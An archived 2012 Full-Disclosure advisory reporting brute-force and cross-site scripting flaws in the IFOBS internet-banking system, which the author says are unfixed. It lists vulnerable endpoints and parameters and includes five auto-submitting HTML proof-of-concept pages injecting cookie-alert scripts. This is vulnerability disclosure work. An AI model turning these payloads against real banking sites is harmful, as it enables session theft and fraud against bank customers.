lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <004501cd966c$8fd7c790$9b7a6fd5@ml>
Date: Wed, 19 Sep 2012 16:41:23 +0300
From: "MustLive" <mustlive@...security.com.ua>
To: <submissions@...ketstormsecurity.org>, <full-disclosure@...ts.grok.org.uk>
Subject: BF and XSS vulnerabilities in IFOBS

Hello list!

I want to warn you about Brute Force and Cross-Site Scripting 
vulnerabilities in system IFOBS.

IFOBS - it's Internet-banking system, which is widespread and particularly 
it's used by large number of Ukrainian banks.

These are the next 36 vulnerabilities in IFOBS: 2 BF and 34 XSS (in the 
first advisory there were 38 vulnerabilities).

-------------------------
Affected products:
-------------------------

Vulnerable are all versions of IFOBS. The developers have ignored and not 
fixed these vulnerabilities (all holes from three advisories).

----------
Details:
----------

Brute Force (WASC-11):

In login form of certificates console 
(http://site/ifobsClient/certmasterlogin.jsp) there is no protection against 
picking up password (captcha).

In forms of checking registration status and editing of registration profile 
there are no protection against picking up password (captcha). Both forms 
are at page http://site/ifobsClient/regclientmain.jsp (they also can be 
accessed by addresses 
http://site/ifobsClient/regclientmain.jsp?myaction=getloginformForStatus and 
http://site/ifobsClient/regclientmain.jsp?myaction=getloginformForEdit) and 
they use the same script.

Cross-Site Scripting (WASC-08):

POST request at page http://site/ifobsClient/regclientmain.jsp in 
parameters: furtherAction, secondName, firstName, thirdName, BirthDay, 
BirthMonth, BirthYear, address, livePlace, passportSerial, passportNumber, 
PassportDay, PassportMonth, PassportYear, passportIssueAgency, 
tempDocSerial, tempDocNumber, DocDay, DocMonth, DocYear, idCodeNumber, 
CodeRegDay, CodeRegMonth, CodeRegYear, idCodeRegPlace, phone, email, 
pmcountry, pmnumber, keyword, password, bankAddress, bankContacts, 
typeclient.

Exploits for the first five vulnerabilities (in parameters furtherAction, 
secondName, firstName, thirdName, BirthDay):

IFOBS XSS-6.html

<html>
<head>
<title>IFOBS XSS exploit (C) 2012 MustLive. 
http://websecurity.com.ua</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/ifobsClient/regclientmain.jsp" 
method="post">
<input type="hidden" name="login" value="111111">
<input type="hidden" name="id" value="1111">
<input type="hidden" name="myaction" value="login">
<input type="hidden" name="furtherAction" 
value='"><script>alert(document.cookie)</script>'>
</form>
</body>
</html>

IFOBS XSS-7.html

<html>
<head>
<title>IFOBS XSS exploit (C) 2012 MustLive. 
http://websecurity.com.ua</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/ifobsClient/regclientmain.jsp" 
method="post">
<input type="hidden" name="secondName" 
value='"><script>alert(document.cookie)</script>'>
<input type="hidden" name="BirthDay" value="01">
<input type="hidden" name="BirthMonth" value="01">
<input type="hidden" name="BirthYear" value="2012">
<input type="hidden" name="myaction" value="submitform">
<input type="hidden" name="typeclient" value="standart">
</form>
</body>
</html>

IFOBS XSS-8.html

<html>
<head>
<title>IFOBS XSS exploit (C) 2012 MustLive. 
http://websecurity.com.ua</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/ifobsClient/regclientmain.jsp" 
method="post">
<input type="hidden" name="firstName" 
value='"><script>alert(document.cookie)</script>'>
<input type="hidden" name="BirthDay" value="01">
<input type="hidden" name="BirthMonth" value="01">
<input type="hidden" name="BirthYear" value="2012">
<input type="hidden" name="myaction" value="submitform">
<input type="hidden" name="typeclient" value="standart">
</form>
</body>
</html>

IFOBS XSS-9.html

<html>
<head>
<title>IFOBS XSS exploit (C) 2012 MustLive. 
http://websecurity.com.ua</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/ifobsClient/regclientmain.jsp" 
method="post">
<input type="hidden" name="thirdName" 
value='"><script>alert(document.cookie)</script>'>
<input type="hidden" name="BirthDay" value="01">
<input type="hidden" name="BirthMonth" value="01">
<input type="hidden" name="BirthYear" value="2012">
<input type="hidden" name="myaction" value="submitform">
<input type="hidden" name="typeclient" value="standart">
</form>
</body>
</html>

IFOBS XSS-10.html

<html>
<head>
<title>IFOBS XSS exploit (C) 2012 MustLive. 
http://websecurity.com.ua</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/ifobsClient/regclientmain.jsp" 
method="post">
<input type="hidden" name="BirthDay" 
value='</script><script>alert(document.cookie)</script>'>
<input type="hidden" name="BirthMonth" value="01">
<input type="hidden" name="BirthYear" value="2012">
<input type="hidden" name="myaction" value="submitform">
<input type="hidden" name="typeclient" value="standart">
</form>
</body>
</html>

------------
Timeline:
------------ 

2012.05.04 - found vulnerabilities during pentest. After I've informed my 
client, he could inform the developers.
2012.05.29 - announced at my site.
2012.06.01 - informed the developers about vulnerabilities (the first 
advisory).
2012.06.01 - informed the developers about vulnerabilities (the second 
advisory).
2012.06.02 - informed the developers about vulnerabilities (the third 
advisory).
2012.09.18 - disclosed at my site (http://websecurity.com.ua/5859/).

Best wishes & regards,
Eugene Dokukin aka MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ